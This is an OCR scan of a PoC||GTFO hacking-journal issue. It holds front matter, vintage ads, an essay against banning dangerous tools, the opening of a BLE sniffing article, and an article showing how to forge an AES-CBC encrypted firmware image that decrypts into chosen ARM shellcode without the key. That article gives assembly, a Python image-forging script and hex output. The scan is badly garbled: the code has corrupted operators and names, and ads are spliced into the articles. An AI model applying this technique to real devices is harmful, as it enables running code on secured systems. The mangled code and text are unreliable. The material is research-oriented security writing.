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It’s damned cold outside, 
so let’s light ourselves a fire! 
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Shared Objects on FreeBS 
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# Start the emulator GUI on localhost:19697 
(cd VirtualAGC/Resources && ../bin/yaDSKY2) & 
# Assemble the firmware image. 


yaYUL pocorgtfo1/.pdf 
# Engage! 
yaAGC --nodebug pocorgtfol7.pdf.bin 





Cover Art: As with the previous issue, the cover illustration from this release is a Hildibrand engraving 
of a painting by Léon Benett that was first published in Le tour du monde en quatre-vingts jours by Jules 
Verne in 1873. 


Printing Instructions: Pirate print runs of this journal are most welcome! PoC||GTFO is to be printed 
duplex, then folded and stapled in the center. Print on A3 paper in Europe and Tabloid (11" x 17") paper 
in Samland, then fold to get a booklet in A4 or Letter size. Secret volcano labs in Canada may use P3 
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# This is how to convert an issue for duplex printing. 


sudo apt-get install pdfjam 
pdfbook --short-edge --vanilla --paper a3paper pocorgtfo1/.pdf -o pocorgtfo17-book.pdf 
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17:01 I thought I turned it on, but I didn't. 


Neighbors, please join me in reading this eigh- 
teenth release of the International Journal of Proof 
of Concept or Get the Fuck Out, a friendly little 
collection of articles for ladies and gentlemen of dis- 
tinguished ability and taste in the field of reverse 
engineering and the study of weird machines. This 
release is a gift to our fine neighbors in Leipzig and 
Washington, D.C. 

If you are missing the first seventeen issues, we 
suggest asking a neighbor who picked up a copy of 
the first in Vegas, the second in Sao Paulo, the third 
in Hamburg, the fourth in Heidelberg, the fifth in 
Montróal, the sixth in Las Vegas, the seventh from 
his parents inkjet printer during the Thanksgiv- 
ing holiday, the eighth in Heidelberg, the ninth in 
Montróal, the tenth in Novi Sad or Stockholm, the 
eleventh in Washington D.C., the twelfth in Heidel- 
berg, the thirteenth in Montréal, the fourteenth in 
Sao Paulo, San Diego, or Budapest, the fifteenth in 
Canberra, Heidelberg, or Miami, the sixteenth re- 
lease in Montréal, New York, or Las Vegas, or the 
seventeenth release in Sao Paulo or Budapest. 

After our paper release, and only when quality 
control has been passed, we will make an electronic 
release named pocorgtfo17.pdf. It is a valid PDF 
document and a ZIP file filled with fancy papers 
and source code. It is also a valid program for the 
Apollo Guidance Computer, which will run in the 
VirtualAGC emulator: 

As you'll recall from PoC||GTFO 3:11, AES in 
CBC mode allows you to flip bits of the initializa- 
tion vector to flip bits of the first cleartext block. 
On page 5, Albert Spruyt and Niek Timmers share 
some handy tricks for using a similar property: by 
flipping bits of one block's ciphertext you can also 
flip blocks of the subsequent ciphertext block after 
decryption. In this manner, they can sacrifice half 
of the blocks by flipping their bits to control the 
other half, loading shellcode into the cleartext of an 
encrypted ARM image for which they have no key. 

Our own Pastor Laphroaig has a sermon for you 
on page 9, concerning the good ol' days of juvenile 
science fiction, when chemistry sets were dangerous 
and Dr. Watson trusty pistol was always at hand. 





Software defined radios and radios built from 
custom hardware can receive damned near anything 
these days, but some of the most clever radio hack- 
ing involves firmware patches to existing, commod- 
ity radios. On page 13, Damien Cauquil shows us 
how to write custom firmware for the nRF51 chip 
in the BBC Micro:Bit to sniff an ongoing Bluetooth 
Low Energy connection, without previously know- 
ing the hop interval, increment, or even the channel 
map. 

Speaking of PHY layer tricks, what does a clever 
neighbor do when he hasn't got a hardware PHY? 
For Ethernet, Andrew Zonenberg simply bitbangs it 
from an old Spartan-6 FPGA and the right resistors. 
Page 21. 

When assembling hardware, sometimes it can be 
ambiguous whether a chip is inserted one way, or 
rotated one hundred and eighty degrees from that 
way. On page 32, Joe Grand shares with us a DIP-8 
design that selectively re-adjusts itself to having the 
chip rotated. Build your PCB by the ferric chloride 
method with a 0.1" DIP socket for proper nostalgia. 

Back in the good ol' days, folks would share 
hooking techniques over a pint of good ale. Now 
that pints have as few as eight ounces, and some jerk 
ranting about Bitcoin ruins all our conversations, 
it's nice to read that Shawn Webb has been playing 
with methods for hooking functions in FreeBSD pro- 
cesses through unprivileged ptrace() debugging. 
Page 34. 

Page 42 features a gumshoe detective novella, 
one in which Soldier of Fortran hangs out his neon 
sign and teams up with Bigendian Smalls to cre- 
ate the niftiest EBCDIC login screen for his z/OS 
mainframe. 

Leandro Pereira has some clever tricks on 
page 56 for injecting additional code into pre- 
existing ELF files to enable defensive features 
through seccomp-bpf. 

On page 60, the last page, we pass around the 
collection plate. Our church has no interest in bit- 
coins or wooden nickels, but we'd love your donation 
of a reverse engineering story. Please send one our 
way. 
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MAC 


Wouldn't it be great— 


to have your telephone book, your 
appointment schedule and your To Do list 
available instantly, 24 hours a day? 

How about daily reminders? Multiple alarm 
clocks? Price list information? Project details? 
Client phone numbers? 








The WristMac” is a high quality digital 
watch that talks to your Macintosh! 





The WristMac™ downloads up to 80 screen pages of your most 
important information in less than 30 seconds. Your data can 
be quickly imported from your existing Macintosh files, 
including Apple's Hypercard stacks, Focal Point Il, QuickDEX, 
Dynodex, Address Book Plus, Smart Alarms, plain text files, and 
many others. Once the information is in the watch, it can be 
edited and transferred back to the Mac, using the optional bi- 
directional adapter! 


The WristMac™ is a complete system, including watch, cable 
and software. It adapts to the way you work: use it as a stand- 
alone system for keeping track of your personal information, or 
use the easy import ability to pick up your existing data. 


Now you CAN take it with you! 


Watch Features: 

e State of the art digital watch with day, date, hours, minutes, 
seconds 

e Additional screen shows two 12-character lines. Timed memos 
sound alarm and display a 12 character message 

e Phone memo shows 12 character name plus phone number 

e Free-form text displays 80 screens of 24 characters, divided 
among up to 12 different headings 

e Included cable connects to Mac Plus, Classic, Portable, SE, SE/30, 
II, IIx, Ilex, lici, SI and LC 


Software Features: 

e New version 2.0 Wristmac Imports from Portfolio System's 
software Dynodex 

e Includes Apple's Hypercard e Imports from Power Up 
2.0 software free! Software's Address Book Plus 

e Can be used as a stand- Imports from Jam Software's 
alone system Smart Alarms 

e Stores and recalls multiple e Imports from Casady & Greene's 
"master lists" QuickDex 

e Extensive on-line help facility e Imports from ACIUS' 4th 


e Imports from Apple's Address Dimension 

and Appointment stacks e Imports from any tab-delimited 
e Imports from Focal Point II text file 

(seven different stacks) e Exports to Survivor Software's 


e Imports from Activision's City MacMoney accounting system 


to City and Business Class e Exports to tab-delimited text files 





Suggested Retail Prices: 


standard WristViac™ (Black, Red, Green, Yellow, Gray) $145 
Executive WristMac™ Black 195 
Pocket WristMac™ 195 
Executive WristMac?M Gold or Silver 245 
Bidirectional Adapter 75 
Watch-to-Watch Transfer Adapter 25 
WristMac™ Software and Cable Kit only 75 
To Order: 


For fast phone service, call 813-882-8635 or fax 813-884-5941 
from 9:00am to 5:30 pm EST, Monday through Friday. 

Or order by mail, from Microseeds Publishing, Inc. 

5901 Benjamin Center Drive - Suite 103 e Tampa, FL 33634. 
Payment by check, money order, Visa or MasterCard. 


The WristMacTM Copyright© 1990 by Ex Machina, Inc. e New York, NY 


17:02 Constructing AES-CBC Shellcode 


Howdy folks! 

Imagine, if you will, that you have managed to 
bypass the authenticity measures (i.e., secure boot) 
of a secure system that loads and executes an binary 
image from external flash. We do not judge, it does 
not matter if you accomplished this using a fancy 
attack like fault injection" or the authenticity mea- 
sures were lacking entirely.^ What's important here 
is that you have gained the ability to provide the 
system with an arbitrary image that will be happily 
executed. But, wait! The image will be decrypted 
right? Any secure system with some self respect will 
provide confidentiality to the image stored in exter- 
nal flash. This means that the image you provided 
to the target is typically decrypted using a strong 
cryptographic algorithm, like AES, using a cipher 
mode that makes sense, like Cipher-Block-Chaining 
(CBC), with a key that is not known to you! 
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SYLVANHILLS PLOTTERS ARE FOR YOU 





Completely assembled X-Y mechanism & interface. 


You add drawing surface, 24V suppl 
Resolution is .Ol inch. Rugged ed carer od 
11x17 inch size ........... eese $795 
DFT-1 Plotter Console.....................................-...--........ $95 
17x22 inch size .............. eee $950 
DFT-2 Plotter Console......................—.............. $115 
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Complete brochure available free on requ 
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Box 646 e Pittsburg, Kansas 66762 e 316-231-4440 S28 
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by Albert Spruyt and Niek Timmers 


Works of exquisite beauty have been made with 
the CBC-mode of encryption. Starting with hum- 
ble tricks, such as bit flipping attacks, we go to 
heights of dizzying beauty with the padding-oracle- 
attack. However, the characteristics of CBC-mode 
provide more opportunities. Today, we'll apply its 
bit-flipping characteristics to construct an image 
that decrypts into executable code! Pretty nifty! 


Cipher-Block-Chaining (CBC) mode 


The primary purpose of the CBC-mode is prevent- 
ing a limitation of the Electronic Code Book (ECB) 
mode of encryption. Long story short, the CBC- 
mode of encryption ensures that plain-text blocks 
that are the same do not result in duplicate cipher- 
text blocks when encrypted. Below is an ASCII art 
depiction of AES decryption in CBC-mode. We de- 
note a cipher text block as CT; and a plain text block 
as PT;. 


CT-1 CT-2 
lee REED 
| | | 

DENS [E 

| | d | | 
IV --- | AES | | | AES | 
MEC Ld du | 

| | | | 

| ool XOR = XOR 
| | 
PT-1 PT-2 


An important aspect of CBC-mode is that the 
decryption of CT9 depends, besides the AES decryp- 
tion, on the value of CT;. Magically, without know- 
ing the decryption key, flipping 1 or more bits in CT, 
will flip 1 or more bits in PT». 

Let's see how that works, where ^1 denotes flip- 
ping a bit at an arbitrary position. 


CT; ^ 1 -- CTo 
Which get decrypted into: 


TRASH + PT2 A 1 


! Bypassing Secure Boot using Fault Injection, Niek Timmers and Albert Spruyt, Black Hat Europe 2016 


? Arm9LoaderHax — Deeper Inside, Jason Dellaluce 


A nasty side effect is that we completely trash 
the decryption of CT; but, if we know the contents 
of PTo, we can fully control PTe to our heart's de- 
light! AII this magic can be attributed to the XOR 
operation being performed after the AES decryp- 
tion. 


Chaining multiple blocks 


We now know how to control a single block de- 
crypted using CBC-mode by trashing another. But 
what about the rest of the image? Well, once we 
make peace with the fact that we will never control 
everything, we can try to control half! If we con- 
sider the bit-flipping discussion above, let's consider 
the following image encrypted with AES-128-CBC, 
for which we do not control the IV: 


CTC Cr. cis: 
Which gets decrypted into: 


PT, de PTs. Pisce PT on. 


No magic here! All is decrypted as expected. 
However, once we flip a bit in CT , like: 


CT; A 1 + CTo +CT3 + CTA +... 


Then, on the next decryption, it means we trash 
PT, but control PT», like: 


TRASH + CTo A 1 + PT3 + PT4 +... 


The beauty of CBC-mode is that with the same 
ease we can provide: 


CT; A 1 + CTə + CT, AL+CTo +... 
Which results in: 


TRASH + CTo A 1 + TRASH + CTo A 14 ... 


Using this technique we can construct an im- 
age in which we control half of the blocks by only 
knowing a single plain-text/cipher-text pair! But, 
this makes you wonder, where can we obtain such 
a pair” Well, we all know that known data (such 
as 00s or FFs) is typically appended to images in 
order to align them to whatever size the developer 
loves. Or perhaps we know the start of an image! 
Not completely unlikely when we consider exception 
vectors, headers, etc. More importantly, it does not 
matter what block we know, as long as we know a 








block or more somewhere in the original encrypted 
image. Now that we cleared this up, let's see how 
we can we construct a payload that will correctly 
execute under these restrictions! 


Payload and Image construction 


Obviously we want to do something useful; that is, 
to execute arbitrary code! As an example, we will 
write some code that prints a string on the serial in- 
terface that allows us to identify a successful attack. 
For the hypothetical target that we have in mind, 
this can be accomplished by leveraging the function 
SendChar() that enables us to print characters on 
the serial interface. This type of functionality is 
commonly found on embedded devices. 








We would like to execute shellcode like the fol- 
lowing: beacon out on the UART and let us know 
that we got code execution, but there's a bit of a 
problem. 





mov r0,#0x50 > D 2 ps 

ldr r5 ,[|pc,#0] ; pc is 8 bytes ahead 

b skip 

„word OxCACABOBO 
skip: 

bl r5 ; Call SendChar 


address of SendChar 


mov r0,#0x6f y r0 = Ton 
bl r5 ; Call SendChar 


mov r0,7:0x43 r0 = °C” 

bl r5 ; Call SendChar 
inf loop: ; loop endlessly 

b inf loop 


This piece of code spans multiple 16-byte blocks, 
which is a problem as we only partially control the 
decrypted image. There will always be a trashed 
block in between controlled blocks. We mitigate this 
problem by splitting up the code into snippets of 
twelve bytes and by adding an additional instruc- 
tion that jumps over the trashed block to the next 
controlled block. By inserting place holders for the 
trash blocks we allow the assembler to fill in the 
right offset for the next block. Once the code is 
assembled, we will remove the placeholders! 


placeholder for trash block 
„word Oxdeadbeef 
„word Oxdeadbeef 
„word Oxdeadbeef 


„word Oxdeadbeef 


first block: 
mov rl,rl 
mov r2,r2 


mov r3 ,r3 
b second block 


; Useless first block 


placeholder for trash block 
.word Oxdeadbeef 
.word Oxdeadbeef 
.word Oxdeadbeef 


.word Oxdeadbeef 


second block: 
mov r0,#0x50 d =: p 


pc is 8 bytes ahead 


ldr r5 ,|pc,;£0| 
b third block 
.word OxCACABOBO ; address of SendChar 


;;placeholder for trash block 
.word Oxdeadbeef 
.word Oxdeadbeef 
.word Oxdeadbeef 


.word Oxdeadbeef 


third block: 
bl r5 : 
mov r0,#0x6f 
bl r5 ; 
b forth block 


Call SendChar 
r0 = ’o’ 
Call SendChar 


placeholder for trash block 
„word Oxdeadbeef 
„word Oxdeadbeef 
„word Oxdeadbeef 


„word Oxdeadbeef 


forth block: 
mov r0,#0x43 
bl r5 

inf loop: 
b inf loop 


nop ; Unused space 





Let's put everything together and write some 
Python (Figure 1) to introduce the concept to you in 
a language we all understand, instead of that most 
impractical of languages, English. We use a differ- 
ent payload that is easier to comprehend visually. 
Obviously, nothing prevents you from replacing the 
actual payload with something useful like the pay- 
load described earlier or anything else of your liking! 


2 





HHH PLAINTEXT #444 

12121212121212121212121212121212 
34343434343434343434343434343434 
56565656565656565656565656565656 
78787878787878787878787878787878 


HHH CIPHERTEXT 74757 

d3875385eb0f7e5de539flee10b91b7b 
18 fa47c26338fa58f581e6e4a33d1948 
6d00a4edb8bed13lebbb41399b8946c9 
26bdc556c94c528b3fe01a8e54a29cd2 


JHHL PAYLOAD 4444 
11111111111111111111111111111111 


22222222222222222222222222222222 


HF IMAGE zz 

f6a2776a0ce2abb'78cOlcd4cb359c3eb5e 
18 fa47c26338fa58f581e6e4a33d1948 
c5914593fd19684bf32ferfs06afOd6d 
18 fa47c26338fa58f581e6e4a33d1948 


HHH DECRYPTED 7777 

6210e41a2635'7e3adcl10'747553d17aea 
11111111111111111111111111111111 
a0a35ead815a3e2b8ff54f0299614211 
22222222222222222222222222222222 


In a real world scenario it is likely that we do 
not control the IV. This means, execution starts 
from the beginning of the image, we'll need to sur- 
vive executing the first block which consists of ran- 
dom bytes. 'This can accomplished by taking the 
results from PoC||GTFO 14:06 into account where 
we showed that surviving the execution of a random 
16-byte block is somewhat trivial (at least on ARM). 
Unless very lucky, we can generate different images 
with a different first block until we can profit! 

We hope the above demonstrates the idea con- 
cretely so you can construct your own magic CBC- 
mode images! :) 





Once again we're reminded that confidentiality is 
not the same as integrity, none of this would be pos- 
sible if the integrity of the data is assured. We also, 
once again, bask in the radiance of the CBC-mode of 
encryption. We've seen that with some very simple 
operations, and a little knowledge of the plain-text, 
we can craft half-controlled images. By simply skip- 
ping over the non-controllable blocks, we can ac- 
tually create a fully functional encrypted payload, 
while having no knowledge of the encryption key. 
If this doesn't convince you of the majesty of CBC 
then nothing will. 


from Crypto.Cipher import AES 


def printBlocks(title ,binString): 
print "\ oH" , title , "HH" 
for i in xrange(0,len(binString) ,16): 
print binString[i:i+16].encode("hex") 


def xor(sl,s2): 
return ''.join([chr(ord(a)^ord(b)) for a,b in zip(sl,s2)|) 


# 


A Prepare the normal image 

a 

IV =""ĄxFE" * 16 

KEY = "x88" x 16 

PLAINTEXT = "\x12"*16 + "Ax34"«*16 + "\x56"*16 + "x78" «16 


CIPHERTEXT = AES. new (KEY, AES.MODE CBC,IV) . encrypt (PLAINTEXT) 


printBlocks("PLAINTEXT" , PLAINTEXT) 
printBlocks("CIPHERTEXT" , CIPHERTEXT) 


# 
## Make the half controlled image, we use 2 CTs and 1 PT 


ZZ from the original encrypted image 
a 

knownCipherText CIPHERTEXT [16:32] 
prevCipherText CIPHERTEXT [0:16] 
knownPlainText PLAINTEXT [16:32] 


AESoutput — xor(prevCipherText , knownPlainText ) 


# Output of the assembler with, placeholder blocks removed 
payload = ’11111111111111111111111111111111’ \ 
22222222222222222222222222222222 ';decode( hex”) 


printBlocks ("PAYLOAD" , payload) 


IMAGE — "" 

for i in range(0,len(payload) ,16) : 
IMAGE += xor(AESoutput, payload [i:1i--16]) 
IMAGE += knownCipherText 


printBlocks ( "IMAGE" ,IMAGE) 


# 
44 What would the decrypted image look like? 


A 
DECRYPTED = AES. new (KEY, AES.MODE CBC, IV ) . decrypt (IMAGE) 
printBlocks ( "DECRYPTED" ,DECRYPTED) 





Figure 1. Python to Force a Payload into AES-CBC 


17:03 In the Company of Rogues: 


Pastor Laphroaig's Tall Tales of Science and of Fiction 


Gather 'round, neighbors. The time for carols 
and fireside stories is upon us. 5o let's talk about lit- 
erature, the heart-warming stories of logic, science, 
and technology. For even though Santa Claus, Sher- 
lock Holmes, and Captain Kirk are equally imagi- 
nary, their impact on us was very real, but also very 
different at the different times of our lives, and we 
want to give them their due. 

Fiction, of course, works by temporary suspen- 
sion of disbelief in made-up things, people, and cir- 
cumstances, but some made-up things make us raise 
our eyebrows higher than others. Still, the weirdest 
part is that the things that are hard to believe in 
the same story sometimes change with time! 

So I was recently re-reading some Sherlock 
Holmes stories, and a thought struck me: in the 
modern world that succeeded Conan Doyle's Lon- 
don, both Mr. Holmes and Dr. Watson would, in 
fact, be criminals. 

Consider: Holmes' use of narcotics to stimulate 
his brain in the absence of a good riddle would surely 
end up with the modern, scientifically organized po- 
lice sending him to prison rather than deferentially 
consulting him on their cases. What's more, with all 
his chemical kit and apparatus, they'd be congratu- 
lating themselves on a major drug lab bust. Even if 
Dr. Watson escaped prosecution as an accomplice, 
he'd likely lose his medical license, at the very least. 

Nor would that be Dr. Watson's only problem. 
Consider his habit of casually sticking his revolver 
in his coat pocket when going out to confront some 
shady and violent characters that his friend's inter- 
ference with their intended victims would severely 
upset. This habit would as likely as not land him 
in serious trouble. His gun crimes were, of course, 
not as bad as Holmes'—*...when Holmes in one of his 
queer humors would sit in an arm-chair with his hair 
trigger and a hundred Boxer cartridges, and proceed 
to adorn the opposite wall with a patriotic V.R. done 
in bullet pocks,... —but would be quite enough to put 
the good doctor away among the very classes of so- 
ciety that Mr. Holmes was so knowledgeable about. 





by P.M.L. 
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I wonder what would surprise Sir Arthur Conan 
Doyle, KStJ, DL more about our scientific moder- 
nity: that an upstanding citizen would need special 
permission to defend himself with the best mechan- 
ical means of the age when standing up for those 
abused by the violent bullies of the age, or that such 
citizens would need a license to own a chemistry 
lab with boiling flasks, Erlenmeyer flasks, adapter 
tubes, and similar glassware,? let alone the chemi- 
cals. 





Just imagine that a few decades from now the 
least believable part of a Gibson cyberpunk novel 
might be not the funky virtual reality, but that the 
protagonist owns a legal debugger. Why, owning 
a road-worthy military surplus tank sounds less far 
fetched! 

In Conan Doyle’s stories, Mr. Holmes and Dr. 
Watson represented the best of the science and tech- 
minded vanguard of their age. Holmes was an ap- 
plied science polymath, well versed in chemistry, 
physics, human biology, and innumerable other 
things. Even his infamous indifference to the Coper- 
nican theory* is likely due to his unwillingness to 
repeat the dictums that a member of the contem- 
porary good society had to “know,” i.e., know to 
repeat, without thinking about them first. As for 





?Regulated as “drug precursors" by, e.g., Texas Department of Public Safety. 

4“ My surprise reached a climax, however, when I found incidentally that he was ignorant of the Copernican Theory and of 
the composition of the Solar System. That any civilized human being in this nineteenth century should not be aware that the 
earth travelled round the sun appeared to be to me such an extraordinary fact that I could hardly realize it.” 


—A Study in Scarlet. 


Dr. Watson, his devotion to science is seriously 
underappreciated—just imagine what sort of stinky, 
loud, and occasionally explosive messes he opted to 
put up with. It takes a genuine conviction of the 
value of scientific experiment to do so, his respect 
for Sherlock notwithstanding. 





Just in case you wonder how Dr. Watson’s trusty 
revolver fits into this, remember that in his time it 
represented the pinnacle of mechanical and chemical 
engineering, just like rocketry did some half a cen- 
tury later. In fact, the Boxer from a couple of para- 
graphs back, Col. Edward Mounier Boxer, F.R.S., 
besides inventing the modern centerfire primer that 
Holmes used in his Webley to spell Queen Victoria's 
initials and that we use to this day in our ammo, also 
designed an early two-stage rocket. This same prin- 
ciple of rocketry was later used by Robert Hutchings 
Goddard. 








But of course times change, and we change with 
them. So I put that book aside, and opened another, 
which was rockets and space travel all over: a Hein- 
lein juvenile novel, Rocket Ship Galileo. Heinlein's 
juvies are a great way to remind yourself about the 
basics of space flight and celestial mechanics—but I 
wish I hadn't, neighbors, not in the frame of mind I 
was in. 


You see, in this 1947 novel three teenagers, who 
dabble in rocketry and earn their rocket pilot li- 
censes, are taken to the Moon by their uncle, a nu- 
clear physicist and space flight expert. The only 
people who try to stop them, under the pretext of 
"endangering minors," are actual Nazis—and the lo- 
cal sheriff sees right through them. So The Galileo 
lifts off to seek adventure and handy explanations 
of the scientific method, the crowd and the state 
police cheer, and the stranger with the fake minor 
protection injunction is taken into custody. 


Now that was 1948. Many things changed since 
then. Vertical landing of space rockets, which made 
the reader of these juvies cringe just a few years ago, 
has become a technical reality. But a sheriff approv- 
ing of a risky activity with mere parental consent 
is what really stretches belief nowadays; the Moon 
Nazis with their fake child protection order would've 
won easily. 
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Granted, juvie fiction is bound to stretch the 
truth a little, to give teenagers a place in the adult 
action to aspire to. But this is the kind of a stretch 
that inspired the first generation of actual NASA 
engineers. The characters of the former NASA en- 
gineer's memoir Rocket Boys built homemade rock- 
ets just like Heinlein's teen protagonists. Just like 
Heinlein's fictional teens, they initially got into trou- 
ble for it, and were similarly rescued by adults who 
used their discretion rather than today's zero toler- 
ance polices. 

Now you can read the book or watch the movie, 
October Sky, and count the felonies a teenager 
these days would rack up for trying the things that 
brought the author, Homer H. Hickam, Jr., from a 
West Virginia coal mining town to NASA. 

And speaking of movies, neighbors, do you re- 
call that Star Trek episode, Arena, in which Cap- 
tain Kirk is dumped on a primitive world and made 
to fight a hostile reptilian alien? The fight is ar- 
ranged by a powerful civilization annoyed by Kirk's 
and the Gorn's ships dog-fighting in their space; it 
somehow fits their sense of justice to reduce a space- 
ship battle to single combat of the captains. Both 
combatants are deprived of any familiar tools, but 


the alien Gorn is much, much stronger, and easily 
tosses Kirk around. 


Of course, all of that was just the setup for a 
classic story of science education. Kirk saves himself 
and his ship by spotting the ingredients for making 
black powder, then using the concoction to disable 
his scaly, armored opponent closing for the kill. 


I wonder, though: would the black powder hack 
have occurred so easily to Kirk if he—and the 
screenwriters, and a significant part of the 1960s 
audience expected to appreciate the trick—hadn't 
as teenagers experimented with making things go 
boom? And, if they hadn't, would there even be a 
Star Trek—and the space program? 








Such skills used to be synonymous with basic sci- 
ence training. Now, for all practical purposes, they 
are synonymous with school suspension if you are 
lucky, or a criminal record if you aren't. 


b 
Li 
m 


yA 





ASN 
\ 





Think about the irony of this, neighbors. The en- 
lightened opinion of our age is all about the virtues 
of STEM, but it punishes with a heavy hand ex- 
actly those interests that propelled the actual sci- 
ence and technology, because they could be danger- 
ous. And what’s dangerous must be banned, and 
children must be taught to fear and shun it, from 
grade school onward. 


How did we come to this? 
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P d kc 
€, O^ 
Wo 5 4 
“e,, ^" 
oe Q, 
A K 
4 
5 Woolworth Bldg. 
s Gy ee ^ 
PR CA 
KA 
o 


These books tell you things every manly 
American boy ought to know. The one atthe 
left tells of the remarkable exploits of four boys 
who are expert in using the rifle, and there is 
also a chapter on how to do fancy shooting. 
The other book tells how to become a crackajack Marksman and how to 
Both books are Free to St. Nicholas xeaders— use the coupon. 


| A pon Rifle Makes an [deal Gift "m a dis a 
over 12, whether one wishes to spend $4.00 or $85.00— 


or any amount in between. 
control, concentration, and right living. 
ful sport, purchase a thoroughbred Remington rifle. 


Remington Arms-Union Metallic Cartridge Co. 
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Rifle shooting fosters habits of self- 
For this clean, health- 
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Somewhere along the way of technological 
progress we have picked up a fallacy that grew and 
grew, until it became the default way of thinking—so 
entrenched that one needs an effort to nail it down 
explicitly, in so many words. 

It is the idea that progress somehow means 
and requires banning or suppressing the danger- 
ous things, the risky things, the tools that could 
be abused to cause harm. If the tool and the skill 
are too useful to be expunged entirely, they must be 
limited to special people who have superior abilities, 
and who are emphatically not you. 

Verily I tell you, neighbors: although it may feel 
fine to suffer the ban on a tool or a skill that nei- 
ther you nor anyone you know cares to use, it is not 
progress you are getting this way; it is the very op- 
posite. For when some tools are deemed to be too 
powerful and too dangerous to be left in your hands, 
the same fallacy will come for your actual favorite 
tools, and sooner than you think. The folks inclined 
to listen to your explanations of why your tools are 
not evil will be too few and far between. 

Knowledge is power, “Scientia potentia est." 
Power, by definition, is dangerous and can be mis- 
used. When the possibility of misuse gets to be 
enough grounds for banning a technology to the pub- 
lic, it's only a matter of time till you are deemed 
unworthy to wield the power of knowledge without 
permission. Good luck with hoping that the bu- 
reaucracy set up to manage these permissions will 
be sympathetic towards your interests. 

And then, of course, the well-meaning commu- 
nity leaders, lawmakers, and officials will wonder 
why people's interest in their approved version of 
STEM is lacking, despite all the glossy pictures of 
happy kids and smiling adult models doing some- 





thing vaguely scientific against the background of 
some generic lab equipment. It doesn't really take 
long for kids to learn that looking for potentia in 
scientia means trouble; and who cares for scientia 
that is not potentia? 


Open a newspaper, neighbors, and you will see a 
lot of folks calling each other “anti-science,” as one of 
the worst possible pejoratives. Yet I wonder: what 
harms science more than banning its basic techno- 
logical artifacts from common use, be they mechan- 
ical, chemical, electronic, or even mathematical?? 
And, should it come to calling the shots on ban- 
ning things, would you rather have the people who 
proclaim the importance of science but have zero 
interest in tinkering with its actual artifacts, or the 
actual tinkerers who obsessively fix cars, hand-load 
ammo, or write programs? 





The world has become a much stranger place 
since the time when our classic tales of logic, sci- 
ence, and technology were written. We will yet have 
to explain again and again that doctors don't cause 
epidemics, that engineers don't cause murder or 
terrorism; and that hackers do not cause computer 
crime. 





Yet through all of this, may we remember to keep 
building our own bird feeders, and to let our neigh- 
bors build theirs, even when we disapprove of theirs 
just as they might disapprove of ours. For this is the 
only way for progress to happen: in freedom and by 
regular, non-special people making risky things that 
have power and learning to make them better. Thus 
and only thus do the tall tales of science and tech- 
nology come true. Amen. 


The Big News Next Month... 
THE YEAR OF THE JACKPOT 


by Robert A. Heinlein 


A remorselessly logical novelet bosed on actual, provable statistics! It's fiction, . of 
course, but you may find that fact hard ta remember! 





5 As is the case with the recent government initiatives in the ever so science-friendly states of New York and California that 


aimed to make it a crime to sell a well-encrypted smartphone. 


GA pinboard in my doctor's office now sports an official memo from a "Department of Public Health” that knows better than 
my doctor how to treat his patients. It mentions an opioid epidemic apparently caused by doctors. Consider this the next time 
you feel inclined to scoff at your ancestors’ unenlightened notion that doctors were to blame for the plagues. 


17:04 Sniffing BUTLE with the Micro:Bit 


Howdy y'all! 

It's well known that sniffing Bluetooth Low En- 
ergy communications is a pain in the bottom, unless 
you have specialty tools like the Ubertooth One and 
its competitors. During my exploration of the BBC 
Micro:Bit, I discovered the very interesting fact that 
it may be used to sniff BLE communications. 

The BBC Micro:Bit is a small device based on 
a nRF51822 transceiver made by Nordic Semicon- 
ductor, with a 5 x 5 LED screen and two buttons 
that can be powered by two AAA batteries. The 
nRF51822 is able to communicate over multiple pro- 
tocols: Enhanced ShockBurst (ESB), ShockBurst 
(SB), GZLL, and Bluetooth Low Energy (BLE). 

Nordic Semiconductor provides its own im- 
plementation of a Bluetooth Low Energy stack, 
released in what they call a SoftDevice and a 
well-known closed-source sniffing firmware used in 
Adafruit's BlueFriend LE sniffer for instance. That 
doesn't help that much, as this firmware relies on 
BLE connection requests to start following a specific 
connection, and not on packets exchanged between 
two devices in an existing connection. So, I found 
no way to cheaply sniff an existing BLE connection. 

In this short article, I'll describe how to imple- 
ment a Bluetooth Low Energy sniffer as software 
on the BBC Micro:Bit that can follow pre-existing 
connection despite channel hopping. In cases where 
channel remapping is in use, it can sniff connections 
on which even the Ubertooth currently fails. 


The Goodspeed Way of Sniffing 


The Micro:Bit being built upon a nRF51822, it ig- 
nited à sparkle in my mind as I remembered the 
hack found by our great neighbor Travis Goodspeed 
who managed to turn another Nordic Semiconduc- 
tor transceiver (nRF24L01--) into a sniffer.’ I was 
wondering if by any chance this nRF51822 would 
have been prone to the same error, and therefore 
could be turned into a BLE sniffer. 

It took me hours to figure out how to reproduce 
this exploit on this chip, but in fact it works exactly 
the same way as described in Travis paper. Since 
the nRF51822 is a lot different than the nRF24L01+ 
(as it includes its own CPU rather being driven by 
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Sunzip pocorgtfoi7.pdf nrf51.pdf 





by Damien Cauquil 


a SPI bus), we must change multiple parameters in 
order to sniff BLE packets over the air. 

First, we need to enable the processor high fre- 
quency clock because it is required before enabling 
the RADIO module of the nRF51822. This is done 
with the following code. 


NRF _CLOCK-SEVENTS HFCLKSTARTED = 0; 
NRF CLOCK—TASKS HFCLKSTART = 1; 





while (NRF_CLOCK->EVENTS_HFCLKSTARTED — 0); 


Then, we must specify the mode, addresses, 
power and frequency our nRF51822 will be tuned 
to. 


/* Maz power. */ 
NRF RADIO--TXPOWFER = ( 
RADIO TXPOWER TXPOWER. 0dBm 
<< RADIO TXPOWER TXPOWER Pas) ; 


/* Setting addresses. */ 
NRF RADIO—TXADDRESS = 0; 
NRF RADIO->RXADDRESSES = 1; 


/* BLE channels are not contiguous, so you 
need to convert them into frequency 
offset. */ 

NRF RADIO—FREQUENCY = 

channel to freq(channel); 


/* Set BLE data rate. */ 
NRF RADIO--MODE = (RADIO MODE MODE Ble 1Mbit 
<< RADIO MODE MODE Pos); 


/* Set the base address. x/ 
NRF RADIO—BASEO = 0x00000000; 
NRF RADIO--PREFIXO = OxAA; // preamble 


The trick here, as described in ‘Travis’ paper, is 
to use an address length of two bytes instead of the 
five bytes expected by the chip. The address length 
is stored in a configuration register called PCNFO, 
along with other extra parameters. The PCNFO and 
PCNF1 registers define the way the nRF51822 will 
behave: its endianness, the expected payload size, 
the address size and much more documented in the 
nRF51 Series Reference Manual.’ 

The following lines of code configure the 
nRF51822 to use a two-byte address, big-endian 
with a maximum payload size of 10 bytes. 














unzip pocorgtfo17.pdf promiscuousnrf24101.pdf # Promiscuity is the nRF24L01+’s Duty 


2|NRF RADIO—PCNFO = 0x00000000 ; 


4| // ENDIAN=0 (little), WHITEEN=0 







